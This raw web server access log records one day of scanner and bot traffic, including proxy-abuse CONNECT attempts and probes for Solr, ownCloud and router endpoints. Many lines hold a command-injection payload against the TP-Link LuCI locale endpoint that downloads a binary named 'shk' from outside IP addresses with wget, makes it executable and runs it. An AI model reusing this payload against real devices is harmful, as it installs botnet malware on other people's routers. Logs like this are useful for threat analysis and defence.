87.121.69.25 - - [15/May/2024:00:15:33 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 179.43.188.110 - - [15/May/2024:00:35:49 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.104 - - [15/May/2024:00:41:30 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.104 - - [15/May/2024:00:41:33 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.104 - - [15/May/2024:00:41:33 +0200] "GET /favicon.ico HTTP/1.1" 404 729 185.180.143.138 - - [15/May/2024:01:10:54 +0200] "GET /owncloud/status.php HTTP/1.1" 404 741 185.180.143.138 - - [15/May/2024:01:10:54 +0200] "GET /status.php HTTP/1.1" 404 728 87.121.69.25 - - [15/May/2024:01:14:56 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 205.210.31.250 - - [15/May/2024:01:44:19 +0200] "GET / HTTP/1.1" 200 1895 179.43.188.110 - - [15/May/2024:01:46:15 +0200] "GET / HTTP/1.1" 200 1895 195.1.144.109 - - [15/May/2024:02:19:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 205.210.31.95 - - [15/May/2024:02:31:21 +0200] "-" 400 1930 205.210.31.95 - - [15/May/2024:02:31:21 +0200] "-" 400 1930 185.16.38.111 - - [15/May/2024:02:34:04 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.49 - - [15/May/2024:02:43:02 +0200] "GET / HTTP/1.0" 200 1895 195.1.144.107 - - [15/May/2024:02:54:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 172.245.131.82 - - [15/May/2024:02:55:51 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [15/May/2024:02:57:07 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 64.62.197.58 - - [15/May/2024:03:01:43 +0200] "-" 400 1930 45.142.182.70 - - [15/May/2024:03:04:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 103.237.86.154 - - [15/May/2024:03:13:05 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.165.17.11 - - [15/May/2024:03:13:55 +0200] "-" 400 1930 107.170.230.37 - - [15/May/2024:03:30:47 +0200] "-" 400 1930 167.99.140.71 - - [15/May/2024:03:42:32 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 752 167.99.140.71 - - [15/May/2024:03:42:32 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 742 179.43.188.110 - - [15/May/2024:04:26:10 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.52 - - [15/May/2024:05:06:59 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 141.98.11.15 - - [15/May/2024:05:26:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 91.92.245.67 - - [15/May/2024:05:27:42 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 179.43.188.110 - - [15/May/2024:06:02:42 +0200] "GET / HTTP/1.1" 200 1895 103.237.86.154 - - [15/May/2024:06:15:01 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [15/May/2024:06:27:35 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 183.81.169.139 - - [15/May/2024:06:28:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 78.108.177.52 - - [15/May/2024:06:35:37 +0200] "GET / HTTP/1.0" 200 1895 185.180.143.136 - - [15/May/2024:06:40:06 +0200] "GET /cgi-bin/main.pl HTTP/1.1" 404 737 87.121.69.25 - - [15/May/2024:07:31:46 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 45.142.182.70 - - [15/May/2024:08:02:45 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 185.16.38.111 - - [15/May/2024:08:45:33 +0200] "GET / HTTP/1.1" 200 1895 179.43.188.110 - - [15/May/2024:09:16:21 +0200] "GET / HTTP/1.1" 200 1895 183.81.169.139 - - [15/May/2024:09:23:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 64.62.197.174 - - [15/May/2024:09:31:31 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.176 - - [15/May/2024:09:31:50 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.197.172 - - [15/May/2024:09:32:03 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.197.167 - - [15/May/2024:09:32:08 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 179.43.188.110 - - [15/May/2024:10:14:30 +0200] "GET / HTTP/1.1" 200 1895 195.1.144.107 - - [15/May/2024:10:28:34 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.25 - - [15/May/2024:10:35:27 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 118.193.32.92 - - [15/May/2024:10:39:33 +0200] "-" 400 1930 118.193.32.92 - - [15/May/2024:10:39:44 +0200] "GET / HTTP/1.1" 200 1895 118.193.32.92 - - [15/May/2024:10:40:02 +0200] "GET /favicon.ico HTTP/1.1" 404 729 118.193.32.92 - - [15/May/2024:10:40:03 +0200] "GET /robots.txt HTTP/1.1" 404 728 118.193.32.92 - - [15/May/2024:10:40:03 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 179.43.188.110 - - [15/May/2024:10:55:29 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [15/May/2024:10:57:33 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.52 - - [15/May/2024:11:02:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.142.182.70 - - [15/May/2024:11:07:41 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 183.81.169.139 - - [15/May/2024:11:29:04 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 188.166.42.80 - - [15/May/2024:11:57:09 +0200] "-" 400 1930 188.166.42.80 - - [15/May/2024:11:57:09 +0200] "-" 400 1930 188.166.42.80 - - [15/May/2024:11:57:09 +0200] "GET / HTTP/1.1" 200 1895 188.166.42.80 - - [15/May/2024:11:57:09 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 188.166.42.80 - - [15/May/2024:11:57:09 +0200] "-" 400 1930 179.43.188.110 - - [15/May/2024:12:05:54 +0200] "GET / HTTP/1.1" 200 1895 195.1.144.109 - - [15/May/2024:12:14:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F193.233.203.237%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 198.199.101.64 - - [15/May/2024:12:16:06 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [15/May/2024:12:31:33 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 185.16.38.111 - - [15/May/2024:12:44:02 +0200] "GET / HTTP/1.1" 200 1895 179.43.188.110 - - [15/May/2024:12:58:51 +0200] "GET / HTTP/1.1" 200 1895 47.76.107.2 - - [15/May/2024:13:03:10 +0200] "GET / HTTP/1.1" 200 1895 47.76.107.2 - - [15/May/2024:13:03:11 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.142.182.70 - - [15/May/2024:13:38:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F14.225.204.172%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 179.43.188.110 - - [15/May/2024:13:51:38 +0200] "GET / HTTP/1.1" 200 1895 103.237.86.154 - - [15/May/2024:14:23:48 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.88.97.226 - - [15/May/2024:14:36:27 +0200] "CONNECT karlshochschule.de:443 HTTP/1.1" 400 804 45.142.182.70 - - [15/May/2024:14:42:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://14.225.204.172/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 756 206.168.32.3 - - [15/May/2024:14:43:45 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [15/May/2024:14:43:48 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [15/May/2024:14:43:49 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.142.182.70 - - [15/May/2024:15:03:49 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://14.225.204.172/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 756 179.43.188.110 - - [15/May/2024:15:05:52 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [15/May/2024:15:09:18 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 195.1.144.107 - - [15/May/2024:15:33:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://14.225.204.172/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 756 78.108.177.51 - - [15/May/2024:15:44:35 +0200] "GET / HTTP/1.0" 200 1895 185.16.38.111 - - [15/May/2024:15:44:49 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [15/May/2024:15:57:08 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 179.43.188.110 - - [15/May/2024:16:43:08 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.52 - - [15/May/2024:17:14:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 91.92.245.67 - - [15/May/2024:17:17:10 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 91.82.36.23 - - [15/May/2024:17:21:52 +0200] "GET / HTTP/1.0" 200 1895 45.142.182.70 - - [15/May/2024:17:36:35 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://14.225.204.172/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 756 80.75.212.75 - - [15/May/2024:17:38:37 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 172.104.242.173 - - [15/May/2024:17:49:38 +0200] "-" 400 1930 141.98.11.15 - - [15/May/2024:17:50:16 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 183.111.79.82 - - [15/May/2024:17:53:42 +0200] "POST /tmUnblock.cgi HTTP/1.1" 404 731 183.111.79.82 - - [15/May/2024:17:53:42 +0200] "-" 400 1930 183.111.79.82 - - [15/May/2024:17:53:42 +0200] "POST /tmUnblock.cgi null" 505 1817 179.43.188.110 - - [15/May/2024:18:17:19 +0200] "GET / HTTP/1.1" 200 1895 87.236.176.253 - - [15/May/2024:19:02:46 +0200] "GET / HTTP/1.1" 200 1895 179.43.188.110 - - [15/May/2024:19:20:57 +0200] "GET / HTTP/1.1" 200 1895 194.169.175.24 - - [15/May/2024:19:38:17 +0200] "-" 400 1930 195.1.144.109 - - [15/May/2024:20:00:38 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://14.225.204.172/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 756 185.16.38.111 - - [15/May/2024:20:29:44 +0200] "GET / HTTP/1.1" 200 1895 179.43.188.110 - - [15/May/2024:21:05:15 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [15/May/2024:21:29:55 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 195.1.144.107 - - [15/May/2024:21:30:03 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://14.225.204.172/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 756 206.168.32.3 - - [15/May/2024:21:30:06 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [15/May/2024:21:30:09 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [15/May/2024:21:30:09 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.156.128.37 - - [15/May/2024:23:02:59 +0200] "GET / HTTP/1.1" 200 1895 45.156.128.37 - - [15/May/2024:23:03:15 +0200] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 767 87.121.69.52 - - [15/May/2024:23:20:09 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 198.235.24.105 - - [15/May/2024:23:30:45 +0200] "-" 400 1930 198.235.24.105 - - [15/May/2024:23:30:45 +0200] "-" 400 1930